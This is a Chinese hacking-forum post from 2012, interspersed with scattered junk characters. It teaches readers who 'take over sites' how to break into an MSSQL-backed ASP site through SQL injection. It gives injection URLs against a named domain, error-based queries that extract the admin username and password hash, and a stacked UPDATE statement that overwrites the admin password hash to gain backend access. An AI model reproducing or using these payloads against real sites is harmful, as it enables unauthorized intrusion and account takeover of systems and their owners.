经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
3 j9 E$ k" F2 @1 U, T h可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL) e8 [$ E- C9 S% K# Y( w! F0 Y
测试如下:
1 D9 [2 ^/ K; B% f+ Y$ ?3 Ihttp://www.tmdsb.com/news.asp?id=121
' L" Y4 C% ^; \7 X+ s5 Q在地址后输入单引号,显示 S( N- w7 v0 t! A; i5 I
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’2 W: \( m$ N3 @! h& u0 B+ N
字符串 ’’’ 之前有未闭合的引号2 O& U3 |* d8 S4 d+ u8 Z0 A" M
/news/tmdws.asp,行63* }$ y5 x3 E: z) |1 A( Q
说明没有过滤单引号且数据库是MSSQL.
4 y$ x* L$ b3 X' e7 i! G, Sand 1=1正常。and 1=2出错。肯定存在注入
: z j; Z/ h, ^0 m, v) q* g* n0 i接着输入
$ n3 h, s( E3 |http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
: _# |0 V- d. {) ?- C8 Q得到帐号为:admin5 p; Y: ]6 z& x' ], r2 ?4 B
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
9 I ] P# F# j% [得到密码为:a4716077c2ba075c
+ a7 n; G6 s0 A: x接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433) C' r! F8 v+ u# j; u
命令如下 :- H8 ] ~8 a' N( h# O
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
+ q& `& K/ z& D8 ]) e这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41